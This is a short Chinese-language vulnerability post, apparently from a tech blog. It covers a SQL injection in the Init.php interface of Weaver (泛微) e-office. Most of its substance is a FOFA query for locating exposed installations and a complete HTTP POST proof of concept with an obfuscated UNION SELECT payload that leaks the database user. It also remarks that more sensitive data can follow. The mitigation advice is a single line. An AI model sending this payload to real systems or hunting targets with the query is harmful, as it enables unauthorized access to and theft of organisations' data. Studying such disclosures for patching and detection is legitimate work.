前言

此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!


一、产品简介

泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。

二、漏洞描述

该系统的Init.php接口存在SQL注入漏洞,攻击者可获取用户敏感信息

三、影响范围

未知

四、复现环境

FOFA:app=“泛微-EOffice”

五、漏洞复现

1.访问存在漏洞的网站,抓包
在这里插入图片描述

2.POC

POST /E-mobile/App/Init.php?m=getSelectList_Crm HTTP/1.1
Host: IP
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 64

cc_parent_id=-999 /*!50000union*/ /*!50000select*/ 1,user()#

3.成功
在这里插入图片描述

六、漏洞利用

后续可获取数据库敏感信息

七、修复建议

请及时更新该系统到最新版本


参考链接

https://blog.csdn.net/holyxp/article/details/134175651


Logo

北京人形旗下天工造物具身智能开源社区,聚焦具身天工与慧思开物两大平台

更多推荐